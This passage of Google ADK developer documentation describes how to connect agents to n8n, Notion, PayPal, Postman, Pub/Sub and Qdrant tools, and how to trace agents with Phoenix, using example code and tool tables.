  instruction: "Help users manage and execute workflows in n8n",
  tools: [
    new MCPToolset({
      type: "StreamableHTTPConnectionParams",
      url: `${N8N_INSTANCE_URL}/mcp-server/http`,
      header: {
        Authorization: `Bearer ${N8N_MCP_TOKEN}`,
      },
    }),
  ],
});

export { rootAgent };
```

## Available tools

| Tool | Description |
| ---------------------- | ------------------------------------------------------- |
| `search_workflows` | Search for available workflows |
| `execute_workflow` | Execute a specific workflow |
| `get_workflow_details` | Retrieve metadata and schema information for a workflow |

## Configuration

To make workflows accessible to your agent, they must meet the following criteria:

- **Be Active**: The workflow must be activated in n8n.
- **Supported Trigger**: Contain a Webhook, Schedule, Chat, or Form trigger node.
- **Enabled for MCP**: You must toggle "Available in MCP" in the workflow settings or select "Enable MCP access" from the workflow card menu.

## Additional resources

- [n8n MCP Server Documentation](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/)

# Notion MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Notion MCP Server](https://github.com/makenotion/notion-mcp-server) connects your ADK agent to Notion, allowing it to search, create, and manage pages, databases, and more within a workspace. This gives your agent the ability to query, create, and organize content in your Notion workspace using natural language.

## Use cases

- **Search your workspace**: Find project pages, meeting notes, or documents based on content.
- **Create new content**: Generate new pages for meeting notes, project plans, or tasks.
- **Manage tasks and databases**: Update the status of a task, add items to a database, or change properties.
- **Organize your workspace**: Move pages, duplicate templates, or add comments to documents.

## Prerequisites

- Obtain a Notion integration token by going to [Notion Integrations](https://www.notion.so/profile/integrations) in your profile. Refer to the [authorization documentation](https://developers.notion.com/docs/authorization) for more details.
- Ensure relevant pages and databases can be accessed by your integration. Visit the Access tab in your [Notion Integration](https://www.notion.so/profile/integrations) settings, then grant access by selecting the pages you'd like to use.

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

NOTION_TOKEN = "YOUR_NOTION_TOKEN"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="notion_agent",
    instruction="Help users get information from Notion",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "@notionhq/notion-mcp-server",
                    ],
                    env={
                        "NOTION_TOKEN": NOTION_TOKEN,
                    },
                ),
                timeout=30,
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const NOTION_TOKEN = "YOUR_NOTION_TOKEN";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "notion_agent",
  instruction: "Help users get information from Notion",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: ["-y", "@notionhq/notion-mcp-server"],
        env: {
          NOTION_TOKEN: NOTION_TOKEN,
        },
      },
    }),
  ],
});

export { rootAgent };
```

## Available tools

| Tool | Description |
| ------------------------ | ------------------------------------------------------------ |
| `notion-search` | Search across your Notion workspace and connected tools like Slack, Google Drive, and Jira. Falls back to basic workspace search if AI features aren’t available. |
| `notion-fetch` | Retrieves content from a Notion page or database by its URL |
| `notion-create-pages` | Creates one or more Notion pages with specified properties and content. |
| `notion-update-page` | Update a Notion page's properties or content. |
| `notion-move-pages` | Move one or more Notion pages or databases to a new parent. |
| `notion-duplicate-page` | Duplicate a Notion page within your workspace. This action is completed async. |
| `notion-create-database` | Creates a new Notion database, initial data source, and initial view with the specified properties. |
| `notion-update-database` | Update a Notion data source's properties, name, description, or other attributes. |
| `notion-create-comment` | Add a comment to a page |
| `notion-get-comments` | Lists all comments on a specific page, including threaded discussions. |
| `notion-get-teams` | Retrieves a list of teams (teamspaces) in the current workspace. |
| `notion-get-users` | Lists all users in the workspace with their details. |
| `notion-get-user` | Retrieve your user information by ID |
| `notion-get-self` | Retrieves information about your own bot user and the Notion workspace you’re connected to. |

## Additional resources

- [Notion MCP Server Documentation](https://developers.notion.com/docs/mcp)
- [Notion MCP Server Repository](https://github.com/makenotion/notion-mcp-server)

# PayPal MCP tool for ADK

Supported in ADK: Python, TypeScript

The [PayPal MCP Server](https://github.com/paypal/paypal-mcp-server) connects your ADK agent to the [PayPal](https://www.paypal.com/) ecosystem.
This integration gives your agent the ability to manage payments, invoices, subscriptions, and disputes using natural language, enabling automated commerce workflows and business insights.

## Use cases

- **Streamline Financial Operations**: Create orders, send invoices, and process refunds directly through chat without switching context. You can instruct your agent to "bill Client X" or "refund order Y" immediately.
- **Manage Subscriptions & Products**: Handle the full lifecycle of recurring billing by creating products, setting up subscription plans, and managing subscriber details using natural language.
- **Resolve Issues & Track Performance**: Summarize and accept dispute claims, track shipment statuses, and retrieve merchant insights to make data-driven decisions on the fly.

## Prerequisites

- Create a [PayPal Developer account](https://developer.paypal.com/)
- Create an app and retrieve your credentials from the [PayPal Developer Dashboard](https://developer.paypal.com/)
- [Generate an access token](https://developer.paypal.com/reference/get-an-access-token/) from your credentials

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

PAYPAL_ENVIRONMENT = "SANDBOX"  # Options: "SANDBOX" or "PRODUCTION"
PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="paypal_agent",
    instruction="Help users manage their PayPal account",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "@paypal/mcp",
                        "--tools=all",
                        # (Optional) Specify which tools to enable
                        # "--tools=subscriptionPlans.list,subscriptionPlans.show",
                    ],
                    env={
                        "PAYPAL_ACCESS_TOKEN": PAYPAL_ACCESS_TOKEN,
                        "PAYPAL_ENVIRONMENT": PAYPAL_ENVIRONMENT,
                    },
                ),
                timeout=300,
            ),
        )
    ],
)
```

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import SseConnectionParams

PAYPAL_MCP_ENDPOINT = "https://mcp.sandbox.paypal.com/sse"  # Production: https://mcp.paypal.com/sse
PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="paypal_agent",
    instruction="Help users manage their PayPal account",
    tools=[
        McpToolset(
            connection_params=SseConnectionParams(
                url=PAYPAL_MCP_ENDPOINT,
                headers={
                    "Authorization": f"Bearer {PAYPAL_ACCESS_TOKEN}",
                },
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const PAYPAL_ENVIRONMENT = "SANDBOX"; // Options: "SANDBOX" or "PRODUCTION"
const PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "paypal_agent",
  instruction: "Help users manage their PayPal account",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: [
          "-y",
          "@paypal/mcp",
          "--tools=all",
          // (Optional) Specify which tools to enable
          // "--tools=subscriptionPlans.list,subscriptionPlans.show",
        ],
        env: {
          PAYPAL_ACCESS_TOKEN: PAYPAL_ACCESS_TOKEN,
          PAYPAL_ENVIRONMENT: PAYPAL_ENVIRONMENT,
        },
      },
    }),
  ],
});

export { rootAgent };
```

**Note (Token Expiration)**: PayPal Access Tokens have a limited lifespan of 3-8 hours. If your agent stops working, ensure your token has not expired and generate a new one if necessary. You should implement token refresh logic to handle token expiration.
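The refresh logic recommended in the note above could look like the following sketch. It caches a token and requests a new one shortly before the old one expires. The names `PayPalTokenCache` and `fetch_token` are hypothetical, and the code assumes the sandbox OAuth 2.0 client-credentials endpoint (`https://api-m.sandbox.paypal.com/v1/oauth2/token`) and the `access_token` and `expires_in` response fields described in PayPal's "Get an access token" reference; verify both against that reference before relying on them.

```python
import base64
import json
import time
import urllib.parse
import urllib.request
from typing import Callable, Optional, Tuple

# Assumption: sandbox OAuth endpoint; production uses a different host.
TOKEN_URL = "https://api-m.sandbox.paypal.com/v1/oauth2/token"


def fetch_token(client_id: str, client_secret: str) -> Tuple[str, float]:
    """Request a token with the client-credentials grant.

    Returns (access_token, lifetime_in_seconds).
    """
    credentials = base64.b64encode(f"{client_id}:{client_secret}".encode()).decode()
    request = urllib.request.Request(
        TOKEN_URL,
        data=urllib.parse.urlencode({"grant_type": "client_credentials"}).encode(),
        headers={
            "Authorization": f"Basic {credentials}",
            "Content-Type": "application/x-www-form-urlencoded",
        },
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=30) as response:
        payload = json.load(response)
    return payload["access_token"], float(payload["expires_in"])


class PayPalTokenCache:
    """Hypothetical helper that refreshes a token before it expires."""

    def __init__(
        self,
        fetch: Callable[[], Tuple[str, float]],
        margin_seconds: float = 300.0,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._fetch = fetch
        self._margin = margin_seconds
        self._clock = clock
        self._token: Optional[str] = None
        self._expires_at = 0.0

    def get(self) -> str:
        """Return a cached token, fetching a new one when close to expiry."""
        now = self._clock()
        if self._token is None or now >= self._expires_at - self._margin:
            self._token, lifetime = self._fetch()
            self._expires_at = now + lifetime
        return self._token
```

A cache would be created with `PayPalTokenCache(lambda: fetch_token(CLIENT_ID, CLIENT_SECRET))`, where both constants are placeholders for your app credentials. With the stdio configuration the token is handed to the server process through `env` at startup, so a refreshed token most likely only takes effect once the `McpToolset` is created again.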
## Available tools

### Catalog management

| Tool | Description |
| ---------------------- | ---------------------------------------------------------- |
| `create_product` | Create a new product in the PayPal catalog |
| `list_products` | List products from the PayPal catalog |
| `show_product_details` | Show details of a specific product from the PayPal catalog |
| `update_product` | Update an existing product in the PayPal catalog |

### Dispute management

| Tool | Description |
| ---------------------- | ---------------------------------------------------------- |
| `list_disputes` | Retrieve a summary of all disputes with optional filtering |
| `get_dispute` | Retrieve detailed information about a specific dispute |
| `accept_dispute_claim` | Accept a dispute claim, resolving it in favor of the buyer |

### Invoices

| Tool | Description |
| -------------------------- | --------------------------------------------------- |
| `create_invoice` | Create a new invoice in the PayPal system |
| `list_invoices` | List invoices |
| `get_invoice` | Retrieve details about a specific invoice |
| `send_invoice` | Send an existing invoice to the specified recipient |
| `send_invoice_reminder` | Send a reminder for an existing invoice |
| `cancel_sent_invoice` | Cancel a sent invoice |
| `generate_invoice_qr_code` | Generate a QR code for an invoice |

### Payments

| Tool | Description |
| --------------- | ------------------------------------------------------------------ |
| `create_order` | Create an order in the PayPal system based on the provided details |
| `create_refund` | Process a refund for a captured payment |
| `get_order` | Get details of a specific payment |
| `get_refund` | Get the details for a specific refund |
| `pay_order` | Capture payment for an authorized order |

### Reporting and insights

| Tool | Description |
| ----------------------- | ------------------------------------------------------------------- |
| `get_merchant_insights` | Retrieve business intelligence metrics and analytics for a merchant |
| `list_transactions` | List all transactions |

### Shipment tracking

| Tool | Description |
| -------------------------- | ------------------------------------------------------------- |
| `create_shipment_tracking` | Create shipment tracking information for a PayPal transaction |
| `get_shipment_tracking` | Get shipment tracking information for a specific shipment |
| `update_shipment_tracking` | Update shipment tracking information for a specific shipment |

### Subscription management

| Tool | Description |
| -------------------------------- | -------------------------------------------- |
| `cancel_subscription` | Cancel an active subscription |
| `create_subscription` | Create a new subscription |
| `create_subscription_plan` | Create a new subscription plan |
| `update_subscription` | Update an existing subscription |
| `list_subscription_plans` | List subscription plans |
| `show_subscription_details` | Show details of a specific subscription |
| `show_subscription_plan_details` | Show details of a specific subscription plan |

## Configuration

You can control which tools are enabled using the `--tools` command-line argument. This is useful for limiting the scope of the agent's permissions. You can enable all tools with `--tools=all` or specify a comma-separated list of specific tool identifiers.

**Note**: The configuration identifiers below use dot notation (e.g., `invoices.create`) which differs from the tool names exposed to the agent (e.g., `create_invoice`).
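As a sketch of how the `--tools` value might be assembled in code, the helper below builds the `args` list for `StdioServerParameters` from a list of configuration identifiers. The function name `paypal_server_args` is hypothetical, and it performs no validation of the identifiers it is given.

```python
from typing import Iterable, List, Optional


def paypal_server_args(tools: Optional[Iterable[str]] = None) -> List[str]:
    """Build the npx arguments for @paypal/mcp.

    With no identifiers, every tool is enabled through --tools=all.
    Otherwise the identifiers are joined into one comma-separated value.
    """
    selected = [t.strip() for t in (tools or []) if t.strip()]
    tools_value = ",".join(selected) if selected else "all"
    return ["-y", "@paypal/mcp", f"--tools={tools_value}"]


# Restrict the agent to creating and listing invoices.
print(paypal_server_args(["invoices.create", "invoices.list"]))
```

Passing the result as `args=paypal_server_args([...])` keeps the permitted scope in one place, which makes it easier to review what the agent is allowed to do.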
- **Products**: `products.create`, `products.list`, `products.update`, `products.show`
- **Disputes**: `disputes.list`, `disputes.get`, `disputes.create`
- **Invoices**: `invoices.create`, `invoices.list`, `invoices.get`, `invoices.send`, `invoices.sendReminder`, `invoices.cancel`, `invoices.generateQRC`
- **Orders & Payments**: `orders.create`, `orders.get`, `orders.capture`, `payments.createRefund`, `payments.getRefunds`
- **Transactions**: `transactions.list`
- **Shipment**: `shipment.create`, `shipment.get`
- **Subscriptions**: `subscriptionPlans.create`, `subscriptionPlans.list`, `subscriptionPlans.show`, `subscriptions.create`, `subscriptions.show`, `subscriptions.cancel`

## Additional resources

- [PayPal MCP Server Documentation](https://docs.paypal.ai/developer/tools/ai/mcp-quickstart)
- [PayPal MCP Server Repository](https://github.com/paypal/paypal-mcp-server)
- [PayPal Agent Tools Reference](https://docs.paypal.ai/developer/tools/ai/agent-tools-ref)

# Phoenix observability for ADK

Supported in ADK: Python

[Phoenix](https://arize.com/docs/phoenix) is an open-source, self-hosted observability platform for monitoring, debugging, and improving LLM applications and AI Agents at scale. It provides comprehensive tracing and evaluation capabilities for your Google ADK applications. To get started, sign up for a [free account](https://phoenix.arize.com/).
## Overview

Phoenix can automatically collect traces from Google ADK using [OpenInference instrumentation](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk), allowing you to:

- **Trace agent interactions** - Automatically capture every agent run, tool call, model request, and response with full context and metadata
- **Evaluate performance** - Assess agent behavior using custom or pre-built evaluators and run experiments to test agent configurations
- **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and unexpected agent behavior
- **Self-hosted control** - Keep your data on your own infrastructure

## Installation

### 1. Install Required Packages

```bash
pip install openinference-instrumentation-google-adk google-adk arize-phoenix-otel
```

## Setup

### 1. Launch Phoenix

These instructions show you how to use Phoenix Cloud. You can also [launch Phoenix](https://arize.com/docs/phoenix/integrations/llm-providers/google-gen-ai/google-adk-tracing) in a notebook, from your terminal, or self-host it using a container.

1. Sign up for a [free Phoenix account](https://phoenix.arize.com/).
1. From the Settings page of your new Phoenix Space, create your API key.
1. Copy your endpoint, which should look like `https://app.phoenix.arize.com/s/[your-space-name]`.

**Set your Phoenix endpoint and API Key:**

```python
import os

os.environ["PHOENIX_API_KEY"] = "ADD YOUR PHOENIX API KEY"
os.environ["PHOENIX_COLLECTOR_ENDPOINT"] = "ADD YOUR PHOENIX COLLECTOR ENDPOINT"

# If you created your Phoenix Cloud instance before June 24th, 2025, set the API key as a header:
# os.environ["PHOENIX_CLIENT_HEADERS"] = f"api_key={os.getenv('PHOENIX_API_KEY')}"
```

### 2. Connect your application to Phoenix

```python
from phoenix.otel import register

# Configure the Phoenix tracer
tracer_provider = register(
    project_name="my-llm-app",  # Default is 'default'
    auto_instrument=True,  # Auto-instrument your app based on installed OI dependencies
)
```

## Observe

Now that tracing is set up, all Google ADK requests are streamed to Phoenix for observability and evaluation.

```python
# This example uses top-level `await`, so it is meant to run in a notebook.
import nest_asyncio

nest_asyncio.apply()

from google.adk.agents import Agent
from google.adk.runners import InMemoryRunner
from google.genai import types


# Define a tool function
def get_weather(city: str) -> dict:
    """Retrieves the current weather report for a specified city.

    Args:
        city (str): The name of the city for which to retrieve the weather report.

    Returns:
        dict: status and result or error msg.
    """
    if city.lower() == "new york":
        return {
            "status": "success",
            "report": (
                "The weather in New York is sunny with a temperature of 25 degrees"
                " Celsius (77 degrees Fahrenheit)."
            ),
        }
    else:
        return {
            "status": "error",
            "error_message": f"Weather information for '{city}' is not available.",
        }


# Create an agent with tools
agent = Agent(
    name="weather_agent",
    model="gemini-2.0-flash-exp",
    description="Agent to answer questions using weather tools.",
    instruction="You must use the available tools to find an answer.",
    tools=[get_weather],
)

app_name = "weather_app"
user_id = "test_user"
session_id = "test_session"

runner = InMemoryRunner(agent=agent, app_name=app_name)
session_service = runner.session_service

await session_service.create_session(
    app_name=app_name,
    user_id=user_id,
    session_id=session_id,
)

# Run the agent (all interactions will be traced)
async for event in runner.run_async(
    user_id=user_id,
    session_id=session_id,
    new_message=types.Content(
        role="user",
        parts=[types.Part(text="What is the weather in New York?")],
    ),
):
    if event.is_final_response():
        print(event.content.parts[0].text.strip())
```

## Support and Resources

- [Phoenix Documentation](https://arize.com/docs/phoenix/integrations/llm-providers/google-gen-ai/google-adk-tracing)
- [Community Slack](https://arize-ai.slack.com/join/shared_invite/zt-11t1vbu4x-xkBIHmOREQnYnYDH1GDfCg#/shared-invite/email)
- [OpenInference Package](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk)

# Postman MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Postman MCP Server](https://github.com/postmanlabs/postman-mcp-server) connects your ADK agent to the [Postman](https://www.postman.com/) ecosystem. This integration gives your agent the ability to access workspaces, manage collections and environments, evaluate APIs, and automate workflows through natural language interactions.

## Use cases

- **API testing**: Continuously test your APIs using your Postman collections.
- **Collection management**: Create and tag collections, update documentation, add comments, or perform actions across multiple collections without leaving your editor.
- **Workspace and environment management**: Create workspaces and environments, and manage your environment variables.
- **Client code generation**: Generate production-ready client code that consumes APIs following best practices and project conventions.

## Prerequisites

- Create a [Postman account](https://identity.getpostman.com/signup)
- Generate a [Postman API key](https://postman.postman.co/settings/me/api-keys)

## Use with agent

Python, local MCP server:

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="postman_agent",
    instruction="Help users manage their Postman workspaces and collections",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "@postman/postman-mcp-server",
                        # "--full",  # Use all 100+ tools
                        # "--code",  # Use code generation tools
                        # "--region", "eu",  # Use EU region
                    ],
                    env={
                        "POSTMAN_API_KEY": POSTMAN_API_KEY,
                    },
                ),
                timeout=30,
            ),
        )
    ],
)
```

Python, remote MCP server:

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams

POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="postman_agent",
    instruction="Help users manage their Postman workspaces and collections",
    tools=[
        McpToolset(
            connection_params=StreamableHTTPServerParams(
                url="https://mcp.postman.com/mcp",
                # (Optional) Use "/minimal" for essential tools only
                # (Optional) Use "/code" for code generation tools
                # (Optional) Use "https://mcp.eu.postman.com" for EU region
                headers={
                    "Authorization": f"Bearer {POSTMAN_API_KEY}",
                },
            ),
        )
    ],
)
```

TypeScript, local MCP server:

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "postman_agent",
  instruction: "Help users manage their Postman workspaces and collections",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: [
          "-y",
          "@postman/postman-mcp-server",
          // "--full", // Use all 100+ tools
          // "--code", // Use code generation tools
          // "--region", "eu", // Use EU region
        ],
        env: {
          POSTMAN_API_KEY: POSTMAN_API_KEY,
        },
      },
    }),
  ],
});

export { rootAgent };
```

TypeScript, remote MCP server:

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const POSTMAN_API_KEY = "YOUR_POSTMAN_API_KEY";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "postman_agent",
  instruction: "Help users manage their Postman workspaces and collections",
  tools: [
    new MCPToolset({
      type: "StreamableHTTPConnectionParams",
      url: "https://mcp.postman.com/mcp",
      // (Optional) Use "/minimal" for essential tools only
      // (Optional) Use "/code" for code generation tools
      // (Optional) Use "https://mcp.eu.postman.com" for EU region
      header: {
        Authorization: `Bearer ${POSTMAN_API_KEY}`,
      },
    }),
  ],
});

export { rootAgent };
```

## Configuration

Postman offers three tool configurations:

- **Minimal** (default): Essential tools for basic Postman operations. Best for simple modifications to collections, workspaces, or environments.
- **Full**: All available Postman API tools (100+ tools). Ideal for advanced collaboration and enterprise features.
- **Code**: Tools for searching API definitions and generating client code. Best for developers who need to consume APIs.

To select a configuration:

- **Local server**: Add `--full` or `--code` to the `args` list.
- **Remote server**: Change the URL path to `/minimal`, `/mcp` (full), or `/code`.

For the EU region, use `--region eu` (local) or `https://mcp.eu.postman.com` (remote).
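The selection rules above can be captured in two small helpers. This is only a sketch: `postman_local_args` and `postman_remote_url` are hypothetical names, not part of ADK or the Postman MCP server, and the sketch assumes the EU host accepts the same URL paths as the default host.

```python
# Hypothetical helpers (not part of ADK or the Postman MCP server) that map a
# configuration name to the local CLI args or the remote URL described above.
LOCAL_FLAGS = {"minimal": [], "full": ["--full"], "code": ["--code"]}
REMOTE_PATHS = {"minimal": "/minimal", "full": "/mcp", "code": "/code"}


def postman_local_args(config: str = "minimal", eu: bool = False) -> list[str]:
    """Build the `args` list for the local (npx) server."""
    args = ["-y", "@postman/postman-mcp-server", *LOCAL_FLAGS[config]]
    if eu:
        args += ["--region", "eu"]
    return args


def postman_remote_url(config: str = "minimal", eu: bool = False) -> str:
    """Build the URL for the remote server (assumes EU uses the same paths)."""
    host = "https://mcp.eu.postman.com" if eu else "https://mcp.postman.com"
    return host + REMOTE_PATHS[config]
```

The returned list can be passed as `args` to `StdioServerParameters`, and the returned string as `url` to the remote connection parameters. An unknown configuration name raises `KeyError`, which keeps typos from silently falling back to the default tool set.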
## Additional resources

- [Postman MCP Server on GitHub](https://github.com/postmanlabs/postman-mcp-server)
- [Postman API key settings](https://postman.postman.co/settings/me/api-keys)
- [Postman Learning Center](https://learning.postman.com/)

# Google Cloud Pub/Sub tool for ADK

Supported in ADK: Python v1.22.0

The `PubSubToolset` allows agents to interact with the [Google Cloud Pub/Sub](https://cloud.google.com/pubsub) service to publish, pull, and acknowledge messages.

## Prerequisites

Before using the `PubSubToolset`, you need to:

1. **Enable the Pub/Sub API** in your Google Cloud project.
1. **Authenticate and authorize**: Ensure that the principal (e.g., user, service account) running the agent has the necessary IAM permissions to perform Pub/Sub operations. For more information on Pub/Sub roles, see the [Pub/Sub access control documentation](https://cloud.google.com/pubsub/docs/access-control).
1. **Create a topic or subscription**: [Create a topic](https://cloud.google.com/pubsub/docs/create-topic) to publish messages and [create a subscription](https://cloud.google.com/pubsub/docs/create-subscription) to receive them.

## Usage

```py
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import asyncio
import os

from google.adk.agents import Agent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.tools.pubsub.config import PubSubToolConfig
from google.adk.tools.pubsub.pubsub_credentials import PubSubCredentialsConfig
from google.adk.tools.pubsub.pubsub_toolset import PubSubToolset
from google.genai import types
import google.auth

# Define constants for this example agent
AGENT_NAME = "pubsub_agent"
APP_NAME = "pubsub_app"
USER_ID = "user1234"
SESSION_ID = "1234"
GEMINI_MODEL = "gemini-2.0-flash"

# Define Pub/Sub tool config.
# You can optionally set the project_id here, or let the agent infer it from context/user input.
tool_config = PubSubToolConfig(project_id=os.getenv("GOOGLE_CLOUD_PROJECT"))

# Uses externally-managed Application Default Credentials (ADC) by default.
# This decouples authentication from the agent / tool lifecycle.
# https://cloud.google.com/docs/authentication/provide-credentials-adc
application_default_credentials, _ = google.auth.default()
credentials_config = PubSubCredentialsConfig(
    credentials=application_default_credentials
)

# Instantiate a Pub/Sub toolset
pubsub_toolset = PubSubToolset(
    credentials_config=credentials_config, pubsub_tool_config=tool_config
)

# Agent Definition
pubsub_agent = Agent(
    model=GEMINI_MODEL,
    name=AGENT_NAME,
    description=(
        "Agent to publish, pull, and acknowledge messages from Google Cloud"
        " Pub/Sub."
    ),
    instruction="""\
        You are a cloud engineer agent with access to Google Cloud Pub/Sub tools.
        You can publish messages to topics, pull messages from subscriptions, and acknowledge messages.
    """,
    tools=[pubsub_toolset],
)

# Session and Runner
session_service = InMemorySessionService()
session = asyncio.run(
    session_service.create_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
)
runner = Runner(
    agent=pubsub_agent, app_name=APP_NAME, session_service=session_service
)


# Agent Interaction
def call_agent(query):
    """
    Helper function to call the agent with a query.
    """
    content = types.Content(role="user", parts=[types.Part(text=query)])
    events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    print("USER:", query)
    for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("AGENT:", final_response)


call_agent("publish 'Hello World' to 'my-topic'")
call_agent("pull messages from 'my-subscription'")
```

## Tools

The `PubSubToolset` includes the following tools:

### `publish_message`

Publishes a message to a Pub/Sub topic.

| Parameter      | Type             | Description                                                                                              |
| -------------- | ---------------- | -------------------------------------------------------------------------------------------------------- |
| `topic_name`   | `str`            | The name of the Pub/Sub topic (e.g., `projects/my-project/topics/my-topic`).                             |
| `message`      | `str`            | The message content to publish.                                                                          |
| `attributes`   | `dict[str, str]` | (Optional) Attributes to attach to the message.                                                          |
| `ordering_key` | `str`            | (Optional) The ordering key for the message. If you set this parameter, messages are published in order. |

### `pull_messages`

Pulls messages from a Pub/Sub subscription.

| Parameter           | Type   | Description                                                                              |
| ------------------- | ------ | ---------------------------------------------------------------------------------------- |
| `subscription_name` | `str`  | The name of the Pub/Sub subscription (e.g., `projects/my-project/subscriptions/my-sub`). |
| `max_messages`      | `int`  | (Optional) The maximum number of messages to pull. Defaults to `1`.                      |
| `auto_ack`          | `bool` | (Optional) Whether to automatically acknowledge the messages. Defaults to `False`.       |

### `acknowledge_messages`

Acknowledges one or more messages on a Pub/Sub subscription.

| Parameter           | Type        | Description                                                                              |
| ------------------- | ----------- | ---------------------------------------------------------------------------------------- |
| `subscription_name` | `str`       | The name of the Pub/Sub subscription (e.g., `projects/my-project/subscriptions/my-sub`). |
| `ack_ids`           | `list[str]` | A list of acknowledgment IDs to acknowledge.                                             |

# Qdrant MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Qdrant MCP Server](https://github.com/qdrant/mcp-server-qdrant) connects your ADK agent to [Qdrant](https://qdrant.tech/), an open-source vector search engine. This integration gives your agent the ability to store and retrieve information using semantic search.

## Use cases

- **Semantic Memory for Agents**: Store conversation context, facts, or learned information that agents can retrieve later using natural language queries.
- **Code Repository Search**: Build a searchable index of code snippets, documentation, and implementation patterns that can be queried semantically.
- **Knowledge Base Retrieval**: Create a retrieval-augmented generation (RAG) system by storing documents and retrieving relevant context for responses.

## Prerequisites

- A running Qdrant instance.
  You can:
  - Use [Qdrant Cloud](https://cloud.qdrant.io/) (managed service)
  - Run locally with Docker: `docker run -p 6333:6333 qdrant/qdrant`
- (Optional) A Qdrant API key for authentication

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

QDRANT_URL = "http://localhost:6333"  # Or your Qdrant Cloud URL
COLLECTION_NAME = "my_collection"
# QDRANT_API_KEY = "YOUR_QDRANT_API_KEY"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="qdrant_agent",
    instruction="Help users store and retrieve information using semantic search",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="uvx",
                    args=["mcp-server-qdrant"],
                    env={
                        "QDRANT_URL": QDRANT_URL,
                        "COLLECTION_NAME": COLLECTION_NAME,
                        # "QDRANT_API_KEY": QDRANT_API_KEY,
                    }
                ),
                timeout=30,
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const QDRANT_URL = "http://localhost:6333"; // Or your Qdrant Cloud URL
const COLLECTION_NAME = "my_collection";
// const QDRANT_API_KEY = "YOUR_QDRANT_API_KEY";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "qdrant_agent",
  instruction: "Help users store and retrieve information using semantic search",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "uvx",
        args: ["mcp-server-qdrant"],
        env: {
          QDRANT_URL: QDRANT_URL,
          COLLECTION_NAME: COLLECTION_NAME,
          // QDRANT_API_KEY: QDRANT_API_KEY,
        },
      },
    }),
  ],
});

export { rootAgent };
```

## Available tools

| Tool           | Description                                                    |
| -------------- | -------------------------------------------------------------- |
| `qdrant-store` | Store information in Qdrant with optional metadata             |
| `qdrant-find`  | Search for relevant information using natural language queries |

